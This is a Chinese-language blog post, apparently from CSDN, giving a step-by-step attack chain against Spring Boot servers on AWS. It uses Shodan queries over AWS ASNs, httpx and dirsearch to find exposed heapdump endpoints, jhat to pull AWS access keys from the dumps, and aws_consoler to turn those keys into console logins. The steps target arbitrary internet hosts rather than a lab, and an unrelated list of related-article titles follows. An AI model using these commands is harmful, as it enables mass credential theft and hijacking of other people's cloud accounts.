0x01 引言

全球云厂商有很多,本文主要针对Spring Boot信息泄露在aws上的利用。

0x02 正文

1) 用shodan分析spring boot服务器在asn上分布的情况

https://beta.shodan.io/search/facet?query=http.favicon.hash%3A116323821&facet=asn

aws的服务器主要分布在as16509和as14618。

2) 通过shodan命令行下载数据

as16509:

shodan download as16509 'http.favicon.hash:116323821 asn:"as16509"' --limit -1

as14618:

shodan download as14618 'http.favicon.hash:116323821 asn:"as14618"' --limit -1

3) 通过httpx探测存活的url

shodan parse --fields ip_str,port --separator : as16509.json.gz | httpx -silent -o as16509.txt

4) 利用dirsearch扫描存在的heapdump文件

  • 所用字典:
heapdump
actuator/heapdump
management/heapdump
  • 扫描命令
python3 dirsearch.py -L as16509.txt -w wordlist.txt -e *
  • 查看结果
cat reports/BATCH-21-03-1616-47-59/ | grep MB

5)利用jhat分析heapdump

jhat -port 7001 heapdump

主要通过以下关键词来寻找凭证:

  • 关键词1: com.amazonaws.auth.BasicAWSCredentials

  • 关键词2 :com.amazonaws.auth.BasicSessionCredentials

6)利用aws_consoler来伪造aws控制台登陆凭证。凭证能否生成和所拥有的权限大小,取决于iam所分配的权限。

aws_consoler -v -a <accessKey> -s <secretKey>aws_consoler -v -a <awsAccessKey> -s <awsSecretKey> -t <sessionToken>

复制url到浏览器中执行,成功登陆到AWS控制台。

0x03 参考

https://github.com/NetSPI/aws_consoler
https://github.com/maurosoria/dirsearch
https://github.com/projectdiscovery/httpx
https://github.com/LandGrey/SpringBootVulExploit

从Spring Boot信息泄露到AWS控制台劫持(攻破aws亚马逊服务器)相关推荐

  1. aws 亚马逊 服务器 运行docker run报错 Got permission denied while trying to connect to the Docker daemon socket

    问题: 当aws亚马逊服务器使用ec2-user运行docker run创建实例时,因为ec2-user没有权限所以会报错Got permission denied while trying to c ...

  2. aws亚马逊服务器上配置jdk环境,执行java -version

    2019-08-11 1629 星期日 enAn aws技术支持 :一般java这个变量我都配置到 /etc/profile.d/里边,里边创建个 java.sh脚 吧变量写进去后边登录也不会失效 p ...

  3. aws主机php环境搭建,亚马逊AWS上安装Nginx(Linux,CentOS环境)

    以前一直使用Apache服务器,但是在内存贵如油的AWS上,使用省内存的Nginx服务器应该是个不错的选择,它能降低我们很多成本. 我们分以下五步,完成aws上nginx的架设. 1. 安装mysql ...

  4. aws ec2 mysql 端口_亚马逊:AWS EC2 的 Linux 服务器 开放端口教程

    导读:这是一篇用屏幕截图解释如何在 AWS(即 Amazon Web Services)不是 IT 世界中的新术语了.它是 AWS 提供服务器计算作为他们的服务之一,他们称之为 EC(弹性计算).使用 ...

  5. 如何万网域名解析亚马逊服务器,使用aws ELB后关于proxy_pass 的域名解析问题

    最近遇到了一个奇怪的问题,我们的一个需要nginx转发的A接口调用另一个IP服务接口时会报502,但是单独调用IP服务时就OK.并且reload A接口的nginx后,居然就正常了. 看了下A接口的n ...

  6. 乐鑫esp8266学习rtos3.0笔记:AT指令固件如何二次开发,实现AT指令连接亚马逊AWS IoT平台;

    本系列博客学习由非官方人员 半颗心脏 潜心所力所写,不做开发板.仅仅做个人技术交流分享,不做任何商业用途.如有不对之处,请留言,本人及时更改. 基于C SDK的ESP8266开发技术全系列笔记 一.N ...

  7. 亚马逊(Amazon)新接口SP-API和PII受限信息的开发者申请

    SP-API(销售伙伴 API )是一个基于 REST 的 API,亚马逊卖家可以使用这些接口,以编程方式访问他们有关商品.订单.付款.报告等的数据.使用销售伙伴 API 的应用程序可以提高销售效率, ...

  8. 上海-亚马逊AWS联合创新中心正式启用

    2018年6月29日,上海市与亚马逊通技术服务(北京)有限公司(以下简称"亚马逊AWS")共建的上海-亚马逊AWS联合创新中心(简称"联合创新中心")正式启用. ...

  9. 亚马逊CEO安全主管:沙特政府窃听贝佐斯手机 获取私人信息

    [TechWeb]4月1日消息,据路透社报道,亚马逊CEO杰夫·贝佐斯的安全主管日前确认,沙特政府可以访问贝佐斯的手机,并从中获取了私人信息. 加文·德贝克尔长期担任亚马逊安全顾问,他表示,已经结束了 ...

最新文章

  1. 10000+ gif表情包不是梦,get这一篇文就够了!!!小哥哥快到碗里来,再也不怕斗图没有表情包了
  2. zabbix 客户端安装
  3. PC行业为何需要华为们被搅局?
  4. 中国生物医药行业供需形势透析及未来投资风险评估报告2022-2027年版
  5. 【iOS atomic、nonatomic、assign、copy、retain、weak、strong】的定义和区别详解
  6. POJ 3660 Cow Contest
  7. c中将数组传递给子函数_在C ++中将对象传递给Non-Member函数
  8. springcloud20---Config加入eureka
  9. windows 2008 ftp配置及用户权限管理
  10. 单例设计模式 (2)
  11. 互联网大厂春节礼盒鄙视链
  12. HTML课程表应用,可在PC和Android运行
  13. 基于SpringMVC国际化资源配置方式Demo
  14. 类垂直站点插件实现与分享
  15. 班级抽签小程序——项目总结
  16. 高通SDX12:USB主模式调试及RTL8153驱动移植
  17. Arduino智能小车——小车测速
  18. 柯桥在PPT中如何制作翻书动画?
  19. 如何解决U盘装系统后磁盘总容量变小
  20. 520浪漫表白,爱要大胆说出来,无法拒绝的浪漫表白网页

热门文章

  1. pythonclass实例化_Python中实例化class的执行顺序示例详解
  2. STM32----摸石头过河系列(三)
  3. 机器学习算法 随机森林学习 之决策树
  4. 道友,来Rstudio里面看动画了
  5. blob没权限 ie_vuerouter 源码和动态路由权限分配
  6. python编写sql注入工具-利用Python实现SQL注入 - Python黑客编程入门系列 - 8
  7. nginx location 斜杠_【一点资讯】斜杠青年双·11买什么本最划算?光影精灵6让你做“多面娇娃” www.yidianzixun.com...
  8. lnmp 清除mysql日志,军哥LNMP 如何关闭 Mysql 日志,并且删除 mysql-bin.0000*日志文件...
  9. C++笔记-異常處理機制(释放堆区空间)
  10. C++ opengl 纹理过滤之GL_NEAREST